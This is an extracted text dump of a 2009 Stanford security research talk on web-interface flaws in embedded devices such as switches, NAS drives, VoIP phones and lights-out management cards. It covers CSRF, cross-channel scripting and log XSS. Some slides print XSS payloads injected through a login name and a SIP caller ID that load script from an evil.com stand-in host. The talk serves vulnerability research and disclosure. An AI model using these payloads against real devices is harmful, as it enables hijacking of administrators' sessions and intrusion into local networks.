embedded management interfaces
play

Embedded Management Interfaces e t u p m Emerging Massive - PowerPoint PPT Presentation

b a L y t i r u c e S r Embedded Management Interfaces e t u p m Emerging Massive Insecurity o C d r o f Hristo Bojinov Elie Bursztein Dan Boneh n a Stanford Computer Security Lab t S Thursday, July 30, 2009


  1. Attack result Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  2. Cross Site Request Forgery (CSRF) illustrated Netgear FS750T2 ‣ Intelligent switch ‣ Configured via Web Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  3. CSRF illustrated Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  4. CSRF illustrated 1 Administer the switch Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  5. CSRF illustrated 1 Administer the switch 2 Browse the web � � � � � � � � Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  6. CSRF illustrated 1 Administer the switch 2 Browse the web P O S T ( e . g . v i a A d s ) 3 T r i g g e r � � � � � � � � Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  7. CSRF illustrated 4 Forward the bad post request 1 Administer the switch 2 Browse the web P O S T ( e . g . v i a A d s ) 3 T r i g g e r � � � � � � � � Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  8. CSRF illustrated 4 Forward the bad post request 1 Administer the switch 2 Browse the web P O S T ( e . g . v i a A d s ) 3 T r i g g e r � � � � � � � � Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  9. CSRF illustrated 4 Forward the bad post request 1 Administer the switch 2 Browse the web P O S T ( e . g . v i a A d s ) 3 T r i g g e r � � � � � � � � Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  10. Cross Channel Scripting (XCS) illustrated LaCie Ethernet disk mini ‣ Share access control ‣ Web interface ‣ Public FTP Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  11. XCS illustrated FTP server NAS upload the file: <script>..</script>.pdf Attacker Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  12. XCS illustrated FTP file server system NAS upload the file: <script>..</script>.pdf Attacker Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  13. XCS illustrated FTP file Web server system App NAS upload the file: reflect the filename: <script>..</script>.pdf <script>..</script>.pdf Attacker Admin Browser Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  14. XCS illustrated FTP file Web server system App NAS upload the file: reflect the filename: <script>..</script>.pdf <script>..</script>.pdf Attacker Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  15. Attack result Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  16. XCS: cross-channel scripting Alternate Web Channels attacker Device User Injection Storage Reflection Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  17. Devices as stepping stones Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  18. Devices as stepping stones 1 Administer the device Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  19. Devices as stepping stones 1 Administer the device 2 Browse internet Internet Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  20. Devices as stepping stones 1 Administer the device 2 Browse internet Internet P O S T ( e . g . v i a A d s ) 3 T r i g g e r Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  21. Devices as stepping stones 4 infect the device 2 Browse internet Internet P O S T ( e . g . v i a A d s ) 3 T r i g g e r Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  22. Devices as stepping stones 5 access files Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  23. Devices as stepping stones 6 Send malicious payload 5 access files Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  24. Devices as stepping stones 6 Send malicious payload 5 access files 7 Attack local network Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  25. Devices as stepping stones 6 Send malicious payload 5 access files 7 Attack local network Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  26. Brands Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  27. Devices Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  28. Vulnerabilities by category Type Num XSS CSRF XCS RXCS File Auth LOM 3 Photo 3 NAS 5 Router 1 IP camera 3 IP phone 1 Switch 4 Printer 3 one vulnerability many vulnerability Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  29. Vulnerabilities by category Type Num XSS CSRF XCS RXCS File Auth LOM 3 Photo 3 NAS 5 Router 1 IP camera 3 IP phone 1 Switch 4 Printer 3 one vulnerability many vulnerability Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  30. Devices by Brand Brand Camera LOM NAS Phone Photo Frame Printer Router Switch � Allied � Buffalo � � D-Link � Dell � eStarling � HP � IBM � Intel � Kodak � LaCie � � � � Linksys � Netgear � Panasonic � QNAP � Samsung � SMC � TrendNet Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  31. Attack surface • Confidentiality • Integrity • Availability • Access control • Attribution Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  32. Attack surface result Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  33. Attack surface result Confidentiality 5 Steal private data Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  34. Attack surface result Confidentiality 5 Steal private data Integrity 22 Reconfigure device Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  35. Attack surface result Confidentiality 5 Steal private data Integrity 22 Reconfigure device Availability 18 Reboot device Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  36. Attack surface result Confidentiality 5 Steal private data Integrity 22 Reconfigure device Availability 18 Reboot device Access files without Access control 23 password Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  37. Attack surface result Confidentiality 5 Steal private data Integrity 22 Reconfigure device Availability 18 Reboot device Access files without Access control 23 password Attribution 22 Don’t log access Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  38. b a L y t i r u c e S r e t u p m o Illustrative Attacks C d r o f n a t S Thursday, July 30, 2009

  39. Login+Log XSS Quick warm-up: LOM LOM basics Log XSS Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  40. Login+Log XSS LOM basics ‣ Lights-out recovery, maintenance, inventory tracking ‣ PCI card and chipset varieties available ‣ Separate NIC and admin login* ‣ Low-security default settings ‣ Motherboard connection ‣ Usually invisible to OS Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  41. Login+Log XSS Log XSS ‣ Known for a decade ‣ Traditionally injected via DNS ‣ Also see recent IBM BladeCenter advisory http://www.cert.fi/en/reports/2009/vulnerability2009029.html Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  42. Persistant Log-based XSS Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  43. Persistant Log-based XSS 1 Attacker attempts to login as user ");</script><script src="//evil.com/"></script><script> Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  44. Persistant Log-based XSS 1 Attacker attempts to login as user ");</script><script src="//evil.com/"></script><script> 2 Admin views syslog Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  45. Persistant Log-based XSS 1 Attacker attempts to login as user ");</script><script src="//evil.com/"></script><script> 2 Admin views syslog � � � � � � � � 3 Payload executes Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  46. Login+Log XSS attack result Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  47. Cross Channel Scripting (XCS) Moving on to real XCS VoIP phone Photo frame Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  48. SIP XCS VoIP phone ‣ Linksys SPA942 ‣ Web interface ‣ SIP support ‣ Call logs Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  49. SIP XCS � � � � � � � � Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  50. SIP XCS 1 SIP: xyz@mydomain calls abc@thatdomain � � � � � � � � Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  51. SIP XCS 1 SIP: xyz@mydomain calls abc@thatdomain � � � � � � � � 2 RTP: carries actual binary data Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  52. SIP XCS Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  53. SIP XCS 1 Attacker makes a call as “<script src="//evil.com/"></script>” Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  54. SIP XCS 1 Attacker makes a call as “<script src="//evil.com/"></script>” 2 Administrator accesses web interface Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend


More recommend